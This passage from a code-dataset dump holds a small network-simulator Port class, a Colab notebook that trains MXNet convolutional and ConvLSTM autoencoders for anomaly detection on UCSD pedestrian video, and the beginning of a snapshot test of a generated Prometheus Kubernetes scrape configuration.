| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
5774d20f167b5c40fda99f981911ca786bf5cf81
| 270
|
py
|
Python
|
src/port.py
|
pedroeml/network-simulator
|
9fe8e884cda22e532bc75485cfe72bb09d4d946a
|
[
"MIT"
] | null | null | null |
src/port.py
|
pedroeml/network-simulator
|
9fe8e884cda22e532bc75485cfe72bb09d4d946a
|
[
"MIT"
] | null | null | null |
src/port.py
|
pedroeml/network-simulator
|
9fe8e884cda22e532bc75485cfe72bb09d4d946a
|
[
"MIT"
] | null | null | null |
class Port:
def __init__(self, mac_address, ip_address, mtu):
self.mac_address = mac_address
self.ip_address = ip_address
self.mtu = mtu
def __str__(self):
return '(%s - %s - %d)' % (self.mac_address, self.ip_address, self.mtu)
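# Minimal usage sketch (illustrative values, not taken from the simulator):
if __name__ == '__main__':
    eth0 = Port('00:1a:2b:3c:4d:5e', '192.168.0.1', 1500)
    print(eth0)  # -> (00:1a:2b:3c:4d:5e - 192.168.0.1 - 1500)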
| 27
| 79
| 0.618519
| 38
| 270
| 3.973684
| 0.342105
| 0.264901
| 0.278146
| 0.211921
| 0.304636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 270
| 9
| 80
| 30
| 0.755
| 0
| 0
| 0
| 0
| 0
| 0.052045
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5795b3dd3a0426b7910b5d6fc9b3be0d205e4a58
| 25,766
|
py
|
Python
|
project_code.py
|
sailalitha96/Anamoly-Detection-in-Videos
|
84b10d58aece23dc898e227760e6f4ab46670cf1
|
[
"MIT"
] | null | null | null |
project_code.py
|
sailalitha96/Anamoly-Detection-in-Videos
|
84b10d58aece23dc898e227760e6f4ab46670cf1
|
[
"MIT"
] | null | null | null |
project_code.py
|
sailalitha96/Anamoly-Detection-in-Videos
|
84b10d58aece23dc898e227760e6f4ab46670cf1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Project Code.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1nAMbry1ZCmxpNFVkdPtLueip2rhxWk0_
"""
!pip install mxnet-cu100
import mxnet as mx
from mxnet import nd, gluon, autograd, gpu
from google.colab import drive
import glob
import numpy as np
import os
from PIL import Image
from scipy import signal
from matplotlib import pyplot as plt
DRIVE_MOUNT='/content/gdrive'
drive.mount(DRIVE_MOUNT)
"""#### **1. CAE:**
**1.1 Training Phase:**
"""
UCSD_FOLDER=os.path.join(DRIVE_MOUNT, 'My Drive', 'UCSD_Anomaly_Dataset.v1p2')
train_files = sorted(glob.glob(UCSD_FOLDER+ '/UCSDped1/Train/*/*'))
train_images = np.zeros((len(train_files),1,100,100))
for idx, filename in enumerate(train_files):
im = Image.open(filename)
im = im.resize((100,100))
train_images[idx,0,:,:] = np.array(im, dtype=np.float32)/255.0
np.save(UCSD_FOLDER+ '/UCSD_Anomaly_Dataset.v1p2.npy',train_images)
class ConvolutionalAutoencoder(gluon.nn.HybridBlock):
def __init__(self):
super(ConvolutionalAutoencoder, self).__init__()
with self.name_scope():
self.encoder = gluon.nn.HybridSequential()
with self.encoder.name_scope():
self.encoder.add(gluon.nn.Conv2D(32, 5, activation='relu'))
self.encoder.add(gluon.nn.MaxPool2D(2))
self.encoder.add(gluon.nn.Conv2D(32, 5, activation='relu'))
self.encoder.add(gluon.nn.MaxPool2D(2))
self.encoder.add(gluon.nn.Dense(2000))
self.decoder = gluon.nn.HybridSequential()
with self.decoder.name_scope():
self.decoder.add(gluon.nn.Dense(32*22*22, activation='relu'))
self.decoder.add(gluon.nn.HybridLambda(lambda F, x: F.UpSampling(x, scale=2, sample_type='nearest')))
self.decoder.add(gluon.nn.Conv2DTranspose(32, 5, activation='relu'))
self.decoder.add(gluon.nn.HybridLambda(lambda F, x: F.UpSampling(x, scale=2, sample_type='nearest')))
self.decoder.add(gluon.nn.Conv2DTranspose(1, kernel_size=5, activation='sigmoid'))
def hybrid_forward(self, F, x):
x = self.encoder(x)
x = self.decoder[0](x)
x = x.reshape((-1,32,22,22))
x = self.decoder[1](x)
x = self.decoder[2](x)
x = self.decoder[3](x)
x = self.decoder[4](x)
return x
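# Quick shape sanity check (a sketch, not in the original notebook): push a
# dummy frame through an initialized copy on CPU; a 1x1x100x100 input should
# come back at the same resolution after the encode/decode round trip.
_cae = ConvolutionalAutoencoder()
_cae.collect_params().initialize(mx.init.Xavier(), ctx=mx.cpu())
assert _cae(mx.nd.zeros((1, 1, 100, 100))).shape == (1, 1, 100, 100)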
im_train = np.load(UCSD_FOLDER+ '/UCSD_Anomaly_Dataset.v1p2.npy')
batch_size= 32
dataset = gluon.data.ArrayDataset(mx.nd.array(im_train, dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=batch_size, last_batch='rollover',shuffle=True)
ctx = gpu()
num_epochs = 50
model = ConvolutionalAutoencoder()
model.hybridize()
model.collect_params().initialize(mx.init.Xavier('gaussian'), ctx=ctx)
loss_function = gluon.loss.L2Loss()
optimizer = gluon.Trainer(model.collect_params(), 'adam', {'learning_rate': 1e-4, 'wd': 1e-5})
## Training Loop ##
loss_train=[]
for epoch in range(num_epochs):
for image_batch in dataloader:
image = image_batch.as_in_context(ctx)
with mx.autograd.record():
output = model(image)
loss = loss_function(output, image)
loss.backward()
optimizer.step(image.shape[0])
loss_train.append(mx.nd.mean(loss).asscalar())
print('epoch [{}/{}], loss:{:.4f}'.format(epoch + 1, num_epochs, mx.nd.mean(loss).asscalar()))
## Saving model parameters ##
model.save_parameters(UCSD_FOLDER+ "/autoencoder_ucsd.params")
np.save(UCSD_FOLDER+'/loss_train_cae.npy',np.array(loss_train))
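## Optional: plot the per-epoch training curve (a sketch, not in the notebook) ##
plt.plot(loss_train)
plt.xlabel('epoch')
plt.ylabel('mean L2 loss')
plt.title('CAE training loss')
plt.show()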
"""**1.2 Testing Phase:**"""
test_file = sorted(glob.glob(UCSD_FOLDER +'/UCSDped1/Test/Test024/*'))
test_file_gt = sorted(glob.glob(UCSD_FOLDER +'/UCSDped1/Test/Test024_gt/*'))
a = np.zeros((len(test_file_gt),2,100,100))
for idx,filename in enumerate(test_file):
im = Image.open(filename)
im = im.resize((100,100))
a[idx,0,:,:] = np.array(im, dtype=np.float32)/255.0
for idx,filename in enumerate(test_file_gt):
im = Image.open(filename)
im = im.resize((100,100))
a[idx,1,:,:] = np.array(im, dtype=np.float32)/255.0
dataset = gluon.data.ArrayDataset(mx.nd.array(a, dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=1)
def plot_regularity_score(model,dataloader):
"""
Calculated regularity score per frame:
Regularity Score = 1 - (e_t - min@t(e_t))/max@t(e_t)
where e_t = sum over pixelwise l2 loss for each frame
"""
e_t = []
for image in dataloader:
img = image[:,0,:,:].reshape(1,1,image.shape[-2],image.shape[-1])
img = img.as_in_context(mx.gpu())
output = model(img)
output = (output.asnumpy().squeeze()*255).reshape(100*100,1)
img = (img.asnumpy().squeeze()*255).reshape(100*100,1)
e_xyt = np.linalg.norm(output-img,axis=1,ord=2)
e_t.append(np.sum(e_xyt))
e_t_min = min(e_t)
e_t_max = max(e_t)
reg_scores = []
for i in range(len(e_t)):
reg_scores.append(1 - ((e_t[i]-e_t_min)/e_t_max))
return reg_scores
model = ConvolutionalAutoencoder()
model.load_parameters(UCSD_FOLDER+ "/autoencoder_ucsd.params",ctx=ctx)
reg_scores_cae = plot_regularity_score(model,dataloader)
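## Plot the regularity score per frame (a sketch, not in the original notebook);
## dips mark frames the CAE reconstructs poorly, i.e. likely anomalies.
plt.plot(reg_scores_cae)
plt.xlabel('frame index')
plt.ylabel('regularity score')
plt.show()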
def plot_anomaly(img, output, diff, H, threshold, counter,UCSD_FOLDER):
"""
Plots four panels side by side: the input frame, the model's reconstruction,
the absolute difference between the two, and the predicted anomalies drawn as
red dots over the input frame. The figure is saved under images/.
"""
fig, (ax0, ax1, ax2,ax3) = plt.subplots(ncols=4, figsize=(10, 5))
ax0.set_axis_off()
ax1.set_axis_off()
ax2.set_axis_off()
ax0.set_title('input image')
ax1.set_title('reconstructed image')
ax2.set_title('diff ')
ax3.set_title('anomalies')
ax0.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
ax1.imshow(output, cmap=plt.cm.gray, interpolation='nearest')
ax2.imshow(diff, cmap=plt.cm.viridis, vmin=0, vmax=255, interpolation='nearest')
ax3.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
x,y = np.where(H > threshold)
ax3.scatter(y,x,color='red',s=0.1)
plt.axis('off')
fig.savefig(UCSD_FOLDER+'/images/' + str(counter) + '.png')
def model_evaluation(model,dataloader):
loss_l2_per_frame = []
threshold = 4*255
counter = 0
test_loss_metric = gluon.loss.SigmoidBCELoss()
for image in dataloader:
counter = counter + 1
img = image[:,0,:,:].reshape(1,1,image.shape[-2],image.shape[-1])
mask = image[:,1,:,:].as_in_context(mx.gpu())
img = img.as_in_context(mx.gpu())
output = model(img)
output = output.transpose((0,2,3,1))
img = img.transpose((0,2,3,1))
output = output.asnumpy()*255
img = img.asnumpy()*255
diff = np.abs(output-img)
tmp = diff[0,:,:,0]
H = signal.convolve2d(tmp, np.ones((4,4)), mode='same')
H_new = mx.nd.array(np.where(H>threshold,1,0).reshape((1,100,100)),ctx=gpu())
loss = test_loss_metric(H_new, mask)
loss_l2_per_frame.append(loss.asscalar())
plot_anomaly(img[0,:,:,0], output[0,:,:,0], diff[0,:,:,0], H, threshold, counter,UCSD_FOLDER)
print("Total loss per frame for anomalies predicted = ",sum(loss_l2_per_frame)/len(dataloader))
## Evaluating the model using the anomaly predictions and regularity scores
model_evaluation(model,dataloader)
"""Saving images as video file:"""
## Saving the output plots as video depicting anomalies ##
import cv2
out_im = sorted(glob.glob(UCSD_FOLDER+ '/images/*.png'))
img_array = []
for filename in out_im:
img = cv2.imread(filename)
height, width, layers = img.shape
img_array.append(img)
size = (width, height)  # VideoWriter expects (width, height) matching the frames
_name = UCSD_FOLDER + '/vid.mp4'
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out_vid = cv2.VideoWriter(_name, fourcc, 15, size)
for img in img_array:
out_vid.write(img)
out_vid.release()
"""#### **2. Spatio- Temporal Layer Stacked CAE:**
**2.1 Training Phase:**
"""
files = sorted(glob.glob(UCSD_FOLDER+'/UCSDped1/Train/*/*'))
train_images = np.zeros((int(len(files)/n), n, 227, 227))
i = 0
idx = 0
for k in range(0, len(files)):
im = Image.open(files[k])
im = im.resize((227, 227))  # frames are 227x227; n consecutive frames form one stack
train_images[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
np.save(UCSD_FOLDER + '/stacked_cae.npy',train_images)
class convSTAE(gluon.nn.HybridBlock):
def __init__(self):
super(convSTAE, self).__init__()
with self.name_scope():
self.encoder = gluon.nn.HybridSequential(prefix="encoder")
with self.encoder.name_scope():
self.encoder.add(gluon.nn.Conv2D(512, kernel_size=15, strides=4, activation='relu'))
self.encoder.add(gluon.nn.BatchNorm())
self.encoder.add(gluon.nn.MaxPool2D(2))
self.encoder.add(gluon.nn.BatchNorm())
self.encoder.add(gluon.nn.Conv2D(256, kernel_size=4, activation='relu'))
self.encoder.add(gluon.nn.BatchNorm())
self.encoder.add(gluon.nn.MaxPool2D(2))
self.encoder.add(gluon.nn.BatchNorm())
self.encoder.add(gluon.nn.Conv2D(128, kernel_size=3, activation='relu'))
self.encoder.add(gluon.nn.BatchNorm())
self.decoder = gluon.nn.HybridSequential(prefix="decoder")
with self.decoder.name_scope():
self.decoder.add(gluon.nn.Conv2DTranspose(channels=256, kernel_size=3, activation='relu'))
self.decoder.add(gluon.nn.BatchNorm())
self.decoder.add(gluon.nn.HybridLambda(lambda F, x: F.UpSampling(x, scale=2, sample_type='nearest')))
self.decoder.add(gluon.nn.BatchNorm())
self.decoder.add(gluon.nn.Conv2DTranspose(channels=512, kernel_size=4, activation='relu'))
self.decoder.add(gluon.nn.BatchNorm())
self.decoder.add(gluon.nn.HybridLambda(lambda F, x: F.UpSampling(x, scale=2, sample_type='nearest')))
self.decoder.add(gluon.nn.BatchNorm())
self.decoder.add(gluon.nn.Conv2DTranspose(channels=10, kernel_size=15, strides=4, activation='sigmoid'))
def hybrid_forward(self, F, x):
x = self.encoder(x)
x = self.decoder(x)
return x
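## Shape sanity check (a throwaway sketch, assuming the mxnet imports above):
## the encoder maps 227 -> 54 -> 27 -> 24 -> 12 -> 10 spatially and the decoder
## mirrors it back (10 -> 12 -> 24 -> 27 -> 54 -> 227), so a 10-channel
## 227x227 stack is reconstructed at full resolution.
_check = convSTAE()
_check.collect_params().initialize(mx.init.Xavier(), ctx=mx.cpu())
assert _check(mx.nd.zeros((1, 10, 227, 227))).shape == (1, 10, 227, 227)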
ctx = gpu()
im_train = np.load(UCSD_FOLDER + '/stacked_cae.npy')
batch_size=32
dataset = gluon.data.ArrayDataset(mx.nd.array(im_train, dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=batch_size, last_batch='rollover',shuffle=True)
num_epochs = 50
model = convSTAE()
model.hybridize()
model.collect_params().initialize(mx.init.Xavier('gaussian'), ctx=ctx)
loss_function = gluon.loss.L2Loss()
optimizer = gluon.Trainer(model.collect_params(), 'adam', {'learning_rate': 1e-4, 'wd': 1e-5})
## Training Loop ##
loss_train_stacked=[]
for epoch in range(num_epochs):
for image_batch in dataloader:
image = image_batch.as_in_context(ctx)
with mx.autograd.record():
output = model(image)
loss = loss_function(output, image)
loss.backward()
optimizer.step(image.shape[0])
loss_train_stacked.append(mx.nd.mean(loss).asscalar())
print('epoch [{}/{}], loss:{:.4f}'.format(epoch + 1, num_epochs, mx.nd.mean(loss).asscalar()))
## Saving model params ##
model.save_parameters(UCSD_FOLDER+ "/autoencoder_stacked_ucsd.params")
np.save(UCSD_FOLDER+'/loss_train_stacked.npy',loss_train_stacked)
"""**2.2 Testing Phase:**"""
model = convSTAE()
model.load_parameters(UCSD_FOLDER +'/autoencoder_stacked_ucsd.params',ctx=ctx)
batch_size= 1
n=10
test_file = sorted(glob.glob(UCSD_FOLDER+ '/UCSDped1/Test/Test024/*'))
test_file_gt = sorted(glob.glob(UCSD_FOLDER+'/UCSDped1/Test/Test024_gt/*'))
a = np.zeros((int(len(test_file)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(test_file)):
im = Image.open(test_file[filename])
im = im.resize((227,227))
a[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
b = np.zeros((int(len(test_file_gt)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(test_file_gt)):
im = Image.open(test_file_gt[filename])
im = im.resize((227,227))
b[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
## Test-time dataloaders for true images and their anomaly masks ##
dataset = gluon.data.ArrayDataset(mx.nd.array(a,ctx= ctx,dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=1)
test_dataset = gluon.data.ArrayDataset(mx.nd.array(b,ctx= ctx, dtype=np.float32))
test_dataloader = gluon.data.DataLoader(test_dataset, batch_size=1)
def plot_anomaly(img, output, diff, H, threshold, counter,UCSD_FOLDER):
fig, (ax0, ax1, ax2,ax3) = plt.subplots(ncols=4, figsize=(10, 5))
ax0.set_axis_off()
ax1.set_axis_off()
ax2.set_axis_off()
ax0.set_title('input image')
ax1.set_title('reconstructed image')
ax2.set_title('diff ')
ax3.set_title('anomalies')
ax0.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
ax1.imshow(output, cmap=plt.cm.gray, interpolation='nearest')
ax2.imshow(diff, cmap=plt.cm.viridis, vmin=0, vmax=255, interpolation='nearest')
ax3.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
x,y = np.where(H > threshold)
ax3.scatter(y,x,color='red',s=0.1)
plt.axis('off')
fig.savefig(UCSD_FOLDER + '/images_stacked_cae/' + str(counter) + '.png')
plt.close(fig)  # free the figure; hundreds are created during evaluation
def loss_compute(output,image_gt,image,UCSD_FOLDER,counter):
loss_l2_per_frame = []
test_loss_metric = gluon.loss.SigmoidBCELoss(from_sigmoid=False)
# the output has 10 channels, one per stacked frame; score each frame separately
output = output.asnumpy().squeeze()*255
image_gt= image_gt.asnumpy().squeeze()
image= image.asnumpy().squeeze()*255
threshold = 4*255
for i in range(0,10):
counter+=1
im_out = output[i,:,:]
im = image[i,:,:]
diff = np.abs(im_out-im)
H = signal.convolve2d(diff, np.ones((4,4)), mode='same')
H_new = mx.nd.array(np.where(H>threshold,1,0).reshape((1,227,227)),ctx=gpu())
mask = mx.nd.array(image_gt[i,:,:].reshape((1,227,227)),ctx=gpu())
loss_l2_per_frame.append(test_loss_metric(H_new,mask).asscalar())
plot_anomaly(im, im_out,diff, H, threshold, counter,UCSD_FOLDER)
return loss_l2_per_frame
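## Why threshold = 4*255: H sums the absolute per-pixel errors (each in
## [0, 255]) over a 4x4 window, so the cutoff 4*255 = 1020 flags windows whose
## mean per-pixel error exceeds 1020/16 = 63.75, about a quarter of the
## intensity range. A uniform error of 64 is just enough to trip it:
assert signal.convolve2d(np.full((4, 4), 64.0), np.ones((4, 4)), mode='same').max() > 4 * 255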
def model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER):
loss = []
im_list = []
counter = 0
for image,image_gt in zip(dataloader,test_dataloader):
output = model(image)
l = loss_compute(output,image_gt,image,UCSD_FOLDER,counter)
counter+=10
loss.extend(l)
print("Total loss per frame for anomalies predicted = ",sum(loss)/len(loss))
model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER)
"""Saving images as video file:"""
import cv2
images = sorted(glob.glob(UCSD_FOLDER+'/images_stacked_cae/*.png'))
img_array = []
for filename in images:
img = cv2.imread(filename)
height, width, layers = img.shape
img_array.append(img)
file_name = UCSD_FOLDER+'/vid_cae.avi'
fourcc = cv2.VideoWriter_fourcc(*'XVID')
size = (1024,720)
out_vid = cv2.VideoWriter(file_name, fourcc, 1, size)
for img in img_array:
frame = cv2.resize(img, size)
out_vid.write(frame)
out_vid.release()
"""#### **3. LSTM-Based Stacked CAE:**
**3.1 Training Phase:**
"""
files = sorted(glob.glob(UCSD_FOLDER+'/UCSDped1/Train/*/*'))
train_images = np.zeros((int(len(files)/n), n, 227, 227))
i = 0
idx = 0
for k in range(0, len(files)):
im = Image.open(files[k])
im = im.resize((227, 227))  # frames are 227x227; n consecutive frames form one stack
train_images[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
np.save(UCSD_FOLDER + '/stacked_cae.npy',train_images)
class ConvLSTMAE(gluon.nn.HybridBlock):
def __init__(self, **kwargs):
super(ConvLSTMAE, self).__init__(**kwargs)
with self.name_scope():
self.encoder = gluon.nn.HybridSequential()
self.encoder.add(gluon.nn.Conv2D(128, kernel_size=11, strides=4, activation='relu'))
self.encoder.add(gluon.nn.Conv2D(64, kernel_size=5, strides=2, activation='relu'))
self.temporal_encoder = gluon.rnn.HybridSequentialRNNCell()
self.temporal_encoder.add(gluon.contrib.rnn.Conv2DLSTMCell((64,26,26), 64, 3, 3, i2h_pad=1))
self.temporal_encoder.add(gluon.contrib.rnn.Conv2DLSTMCell((64,26,26), 32, 3, 3, i2h_pad=1))
self.temporal_encoder.add(gluon.contrib.rnn.Conv2DLSTMCell((32,26,26), 64, 3, 3, i2h_pad=1))
self.decoder = gluon.nn.HybridSequential()
self.decoder.add(gluon.nn.Conv2DTranspose(channels=128, kernel_size=5, strides=2, activation='relu'))
self.decoder.add(gluon.nn.Conv2DTranspose(channels=10, kernel_size=11, strides=4, activation='sigmoid'))
def hybrid_forward(self, F, x, states=None, **kwargs):
x = self.encoder(x)
x, states = self.temporal_encoder(x, states)
x = self.decoder(x)
return x, states
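## Shape sanity check (a throwaway sketch): the spatial encoder maps
## 227 -> 55 -> 26, matching the (64, 26, 26) input expected by the first
## Conv2DLSTMCell, and the transposed convolutions map 26 -> 55 -> 227 back.
_check = ConvLSTMAE()
_check.collect_params().initialize(mx.init.Xavier(), ctx=mx.cpu())
_states = _check.temporal_encoder.begin_state(batch_size=1, ctx=mx.cpu())
_out, _ = _check(mx.nd.zeros((1, 10, 227, 227)), _states)
assert _out.shape == (1, 10, 227, 227)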
batch_size=8
dataset = gluon.data.ArrayDataset(mx.nd.array(im_train, dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=batch_size, last_batch='rollover',shuffle=True)
model = ConvLSTMAE()
ctx = gpu()
num_epochs = 50
model.hybridize()
model.collect_params().initialize(mx.init.Xavier(), ctx=mx.gpu())
loss_function = gluon.loss.L2Loss()
optimizer = gluon.Trainer(model.collect_params(), 'adam', {'learning_rate': 1e-4, 'wd': 1e-5})
states = model.temporal_encoder.begin_state(batch_size=batch_size, ctx=ctx)
loss_train_lstm=[]
for epoch in range(num_epochs):
for image_batch in dataloader:
image = image_batch.as_in_context(ctx)
with mx.autograd.record():
output, states = model(image, states)
# do not re-wrap `output` in a fresh NDArray here: copying it out of the
# recorded graph would detach it from autograd and silently stop gradients
loss = loss_function(output, image)
loss.backward()
optimizer.step(image.shape[0])
loss_train_lstm.append(mx.nd.mean(loss).asscalar())
print('epoch [{}/{}], loss:{:.4f}'.format(epoch + 1, num_epochs, mx.nd.mean(loss).asscalar()))
model.save_parameters(UCSD_FOLDER+ "/autoencoder_lstm_ucsd.params")
np.save(UCSD_FOLDER+'/loss_train_lstm.npy',loss_train_lstm)
"""**3.2 Testing Phase:**"""
model = ConvLSTMAE()
model.load_parameters(UCSD_FOLDER +'/autoencoder_lstm_ucsd.params',ctx=ctx)
batch_size= 1
n=10
test_file = sorted(glob.glob(UCSD_FOLDER+ '/UCSDped1/Test/Test024/*'))
test_file_gt = sorted(glob.glob(UCSD_FOLDER+'/UCSDped1/Test/Test024_gt/*'))
a = np.zeros((int(len(test_file)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(test_file)):
im = Image.open(test_file[filename])
im = im.resize((227,227))
a[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
b = np.zeros((int(len(test_file_gt)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(test_file_gt)):
im = Image.open(test_file_gt[filename])
im = im.resize((227,227))
b[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
## Test-time dataloaders for true images and their anomaly masks ##
dataset = gluon.data.ArrayDataset(mx.nd.array(a,ctx= ctx,dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=1)
test_dataset = gluon.data.ArrayDataset(mx.nd.array(b,ctx= ctx, dtype=np.float32))
test_dataloader = gluon.data.DataLoader(test_dataset, batch_size=1)
def plot_anomaly(img, output, diff, H, threshold, counter,UCSD_FOLDER):
fig, (ax0, ax1, ax2,ax3) = plt.subplots(ncols=4, figsize=(10, 5))
ax0.set_axis_off()
ax1.set_axis_off()
ax2.set_axis_off()
ax0.set_title('input image')
ax1.set_title('reconstructed image')
ax2.set_title('diff ')
ax3.set_title('anomalies')
ax0.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
ax1.imshow(output, cmap=plt.cm.gray, interpolation='nearest')
ax2.imshow(diff, cmap=plt.cm.viridis, vmin=0, vmax=255, interpolation='nearest')
ax3.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
x,y = np.where(H > threshold)
ax3.scatter(y,x,color='red',s=0.1)
plt.axis('off')
fig.savefig(UCSD_FOLDER + '/images_stacked_lstm/' + str(counter) + '.png')
plt.close(fig)  # free the figure; hundreds are created during evaluation
def loss_compute(output,image_gt,image,UCSD_FOLDER,counter):
loss_l2_per_frame = []
test_loss_metric = gluon.loss.SigmoidBCELoss(from_sigmoid=False)
# the output has 10 channels, one per stacked frame; score each frame separately
output = output.asnumpy().squeeze()*255
image_gt= image_gt.asnumpy().squeeze()
image= image.asnumpy().squeeze()*255
threshold = 4*255
for i in range(0,10):
counter+=1
im_out = output[i,:,:]
im = image[i,:,:]
diff = np.abs(im_out-im)
H = signal.convolve2d(diff, np.ones((4,4)), mode='same')
H_new = mx.nd.array(np.where(H>threshold,1,0).reshape((1,227,227)),ctx=gpu())
mask = mx.nd.array(image_gt[i,:,:].reshape((1,227,227)),ctx=gpu())
loss_l2_per_frame.append(test_loss_metric(H_new,mask).asscalar())
plot_anomaly(im, im_out,diff, H, threshold, counter,UCSD_FOLDER)
return loss_l2_per_frame
def model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER,states):
counter = 0
loss = []
im_list = []
i = 0
for image,image_gt in zip(dataloader,test_dataloader):
output,_ = model(image,states)
l = loss_compute(output,image_gt,image,UCSD_FOLDER,counter)
counter+=10
loss.extend(l)
print("Total loss per frame for anomalies predicted = ",sum(loss)/len(loss))
## Evaluating the model using the anomaly predictions and regularity scores
states = model.temporal_encoder.begin_state(batch_size=batch_size, ctx=ctx)
model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER,states)
"""Saving images as video file:"""
import cv2
images = sorted(glob.glob(UCSD_FOLDER + '/images_stacked_lstm/*.png'))
img_array = []
for filename in images:
img = cv2.imread(filename)
height, width, layers = img.shape
img_array.append(img)
file_name = UCSD_FOLDER+'/vid_lstm_cae.avi'
fourcc = cv2.VideoWriter_fourcc(*'XVID')
size = (1024,720)
out_vid = cv2.VideoWriter(file_name, fourcc, 1, size)
for img in img_array:
frame = cv2.resize(img, size)
out_vid.write(frame)
out_vid.release()
"""#### **4. Regularity Scores Comparison:**"""
def plot_regularity_score_on_stacked_images(model,dataloader,states=None,lstm=False):
"""
Calculates the regularity score per frame:
Regularity Score s(t) = 1 - (e(t) - min_t e(t)) / max_t e(t)
where e(t) is the sum of the pixelwise L2 reconstruction errors of frame t.
"""
e_t = []
for image in dataloader:
img = image.as_in_context(gpu())
if lstm:
output ,_ = model(img,states)
else:
output = model(img)
output = output.asnumpy().squeeze()*255
img = img.asnumpy().squeeze()*255
for i in range(output.shape[0]):
a = output[i,:,:].reshape(227*227,1)
b = img[i,:,:].reshape(227*227,1)
e_xyt = np.linalg.norm(a-b,axis=1,ord=2)
e_t.append(sum(e_xyt))
e_t_min = min(e_t)
e_t_max = max(e_t)
reg_scores = []
for i in range(len(e_t)):
reg_scores.append(1 - ((e_t[i]-e_t_min)/e_t_max))
return reg_scores
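## Each batch is one stack of 10 frames and contributes 10 per-frame scores,
## so the 200 frames of Test024 yield 200 scores, directly comparable to the
## per-frame CAE scores computed in section 1.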
model_stcae = convSTAE()
model_stcae.load_parameters(UCSD_FOLDER +'/autoencoder_stacked_ucsd.params',ctx=ctx)
model_lstm = ConvLSTMAE()
model_lstm.load_parameters(UCSD_FOLDER +'/autoencoder_lstm_ucsd.params',ctx=ctx)
reg_scores_stcae = plot_regularity_score_on_stacked_images(model_stcae,dataloader,lstm=False)
states = model_lstm.temporal_encoder.begin_state(batch_size=batch_size, ctx=ctx)
reg_scores_lstm = plot_regularity_score_on_stacked_images(model_lstm,dataloader,states,lstm=True)
## Plots
plt.plot(reg_scores_cae,color ='red')
plt.plot(reg_scores_stcae,color = 'green')
plt.plot(reg_scores_lstm,color='blue')
plt.xlabel("frame number")
plt.ylabel("regularity score")
plt.title( "Regularity Score per frame")
plt.legend(['CAE','STCAE', 'LSTM-STCAE'])
plt.show()
"""#### **5. Training Loss Comparison:**"""
loss_train = np.load(UCSD_FOLDER+'/loss_train_cae.npy')
loss_train_stacked = np.load(UCSD_FOLDER+'/loss_train_stacked.npy')
loss_train_lstm = np.load(UCSD_FOLDER+'/loss_train_lstm.npy')
plt.plot(loss_train,'r')
plt.plot(loss_train_stacked,'g')
plt.plot(loss_train_lstm,'b')
plt.title('Training Loss vs Epochs')
plt.legend(['CAE','STCAE','LSTM-STCAE'])
plt.xlabel('epoch')
plt.ylabel('reconstruction loss')
plt.show()
# --- next file: tests/snapshots/snap_promgen_k8s_test.py (repo: cmur2/promgen-k8s, license: Apache-2.0) ---
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots['TestPromgenK8s::test_generate 1'] = [
'---',
'global:',
' evaluation_interval: 1m',
' scrape_interval: 1m',
'rule_files:',
' - /etc/alert.rules',
'scrape_configs:',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-nodes',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: node',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
